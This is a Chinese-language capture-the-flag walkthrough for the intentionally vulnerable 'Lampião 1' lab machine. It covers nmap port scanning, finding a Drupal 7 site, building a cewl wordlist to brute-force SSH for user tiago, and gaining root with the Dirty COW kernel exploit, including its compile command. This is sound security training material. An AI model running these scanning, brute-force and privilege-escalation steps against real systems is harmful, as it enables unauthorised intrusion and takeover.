靶机下载地址:戳我
Would you like to keep hacking in your own lab?
Try this brand new vulnerable machine! “Lampião 1”.
Get root!
Level: Easy
目标,获得root权限。
0x00 信息收集
使用kali的fping命令探测存活主机,得到该靶机的IP为192.168.187.148。
使用nmap探测端口的开放情况:nmap -sS -p 1-65535 -v 192.168.187.148
-sS TCP SYN扫描 nmap -sS 192.168.187.148 -P 指定端口扫描 nmap -sS -P 1-65535 192.168.187.148 -V 详细信息 nmap -V -sS 192.168.187.148

还行,只有22(ssh)、80和1898。访问下80端口,是一个振奋人心的字符串画,除此以外未挖掘出任何信息。

访问1898端口,页面尾部有Powered by Drupal,通过Wappalyzer插件可以知道是Drupal 7,感觉能从这个页面进行深入渗透^^

0x01 获取权限
页面中的两篇文章的相对路径分别是?q=node/1
和/?q=node/3
,如果修改成2会来到隐藏页面:

下载这两个文件。audio.m4a播放可得到信息“user tiago”。扫描qrc.png可得到信息“Try harder! muahuahua”,看了下exif和文件尾部这些的,没有其他信息了…。
使用用户名tiago爆破ssh,字典使用cewl工具,通过爬取网站并提取独立的单词保存为字典:
cewl http://192.168.187.148:1898/ -w password
得到ssh密码为Virgulino:

登入ssh:

0x02 提升权限
试了下sudo -i
不好使:
tiago is not in the sudoers file. This incident will be reported.
老规矩看下uname -a
:
Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 athlon i686 GNU/Linux
利用linux-exploit-suggester找到这个版本存在的漏洞:

使用脏牛提权:
/usr/share/exploitdb/exploits/lnux/local/40847.cpp
编译:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

使用root账户登录^^密码已经改为dirtyCowFun
